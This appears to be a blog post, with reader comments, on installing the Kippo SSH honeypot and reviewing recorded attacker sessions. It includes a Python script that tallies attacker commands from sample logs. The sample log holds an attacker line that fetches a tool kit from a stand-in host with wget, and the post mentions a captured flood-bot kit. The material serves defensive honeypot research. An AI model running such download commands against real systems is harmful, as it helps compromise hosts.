Thanks to Lukas Rist's suggestion I found the Kippo SSH honeypot. Kippo is developed by Upi Tamminen and, according to the project's homepage, "Kippo is inspired, but not based on Kojoney", so I decided to give it a try.
Kippo setup and installation is quite simple. You only have to download it, uncompress it, edit the kippo.cfg file (I changed the hostname) and run it with ./start.sh.
Kippo has great features. It emulates a Debian 5.0 filesystem, implements interesting shell commands and it allows the attacker to download files with wget, but what I really love is that it records the attacker session in a way that you can play it back later to analyze it. If anyone is interested, I can upload the session logs.
Updated: Please read mig5's comments on this post for more great information and impressions about Kippo!
My honeypot has recorded three long sessions and these are the most frequent commands used by the attackers:
- Implemented by Kippo: w, ls, cd, uptime, cat /proc/cpuinfo, uname -a, passwd (but it shows that passwords mismatch), wget…
- Not implemented by Kippo: cat /etc/issue, cat /proc/version, adduser…
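As an added example (not from the post and not part of Kippo itself), here is a small Python script that tallies the commands attackers typed in Kippo-style session logs and flags the ones the honeypot answered with "Command not found", which is exactly the emulation gap listed above and a fingerprinting risk worth closing. The log line layout and the sample lines are constructed assumptions; check them against the logs of your own instance.

```python
import re
from collections import Counter

# Constructed sample in the style of Kippo's text log. The layout (timestamp,
# transport tag ending in "<id>,<peer ip>", then "CMD: <line>" or
# "Command not found: <name>") is an assumption of this example, not from the post.
SAMPLE_LOG = """\
2011-12-30 21:03:11+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] CMD: w
2011-12-30 21:03:14+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] CMD: uname -a
2011-12-30 21:03:22+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] CMD: adduser test
2011-12-30 21:03:22+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,1,192.0.2.10] Command not found: adduser test
2011-12-31 02:17:05+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.7] CMD: w
2011-12-31 02:17:09+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.7] CMD: cat /proc/cpuinfo
2011-12-31 02:17:30+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.7] CMD: wget http://example.invalid/kit.tgz
2011-12-31 02:17:45+0100 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,2,198.51.100.7] CMD: passwd
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) \[.*HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\] "
    r"(?P<kind>CMD|Command not found): (?P<rest>.*)$"
)

def analyze(log_text):
    """Summarise attacker activity: per-command frequency, commands the
    honeypot could not emulate, and which sessions (transport id, peer) ran them."""
    commands = Counter()   # command name -> how often it was typed
    not_found = Counter()  # command name -> how often Kippo had no emulation for it
    sessions = {}          # (sid, ip) -> full command lines, in order
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue       # unrelated lines (logins, downloads, ...) are skipped
        key = (int(m["sid"]), m["ip"])
        name = m["rest"].split()[0]
        if m["kind"] == "CMD":
            commands[name] += 1
            sessions.setdefault(key, []).append(m["rest"])
        else:
            not_found[name] += 1
    # Any command attackers typed that was answered with "not found" is a
    # coverage gap: a candidate for emulation and a way the honeypot can be spotted.
    gaps = sorted(not_found)
    return {"commands": commands, "not_found": not_found, "sessions": sessions, "gaps": gaps}

if __name__ == "__main__":
    r = analyze(SAMPLE_LOG)
    for name, n in r["commands"].most_common():
        flag = "  (NOT IMPLEMENTED)" if name in r["not_found"] else ""
        print(f"{n:3d}  {name}{flag}")
```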
So far the attackers have downloaded three files that I will examine in the following days, but a quick inspection shows that one of the files contains a kit to turn a host into a flood bot. It seems promising.
I really recommend this honeypot if you want a didactic tool.
Have fun!
Very nice find! Look forward to adding this to my own research environment.
Keep up the good work with the blog, look forward to seeing more results!
Nice,
I highly recommend installing the very bleeding edge from the svn repo. It has support for logging to mysql, which is much easier than reading logs, and a bunch of other cool new features.
Note that you have to copy the kippo.cfg.dist file to kippo.cfg before Kippo will start successfully, and that it starts on port 2222 (unprivileged port), so some iptables REDIRECT may be needed if you want to expose the honeypot to the traditional port 22.
P.S. for Debian users, an apt-get install python-twisted is probably enough to grab all the relevant dependencies.
Thanks for the tip-off on this excellent honeypot!
Discovering the project has also led me to stumble upon #honeypots on irc.freenode.net – I’ll maybe see you guys there as I tend to idle in IRC most of the time.
Thanks a lot for your comments, they are great for people looking for info about Kippo, and thanks for reading my posts!
[...] I hadn’t found time to implement the system in a live environment, but a recent post on the Diatel blog suggested that installation may be quick and pain [...]
Hi doncicuto, I don't know if you're still actively monitoring your Kippo honeypot(s), but fyi I'm writing a tool to visualize the logs called Kippo-Graph. You might want to check it out, link: http://ikoniari.webpages.auth.gr/kippo-graph
Hi Ion,
I'll install your tool as soon as I'm back from my holidays. The features and screenshots at your blog look great, so thanks in advance for your work and for letting me know about Kippo-Graph. Happy 2012!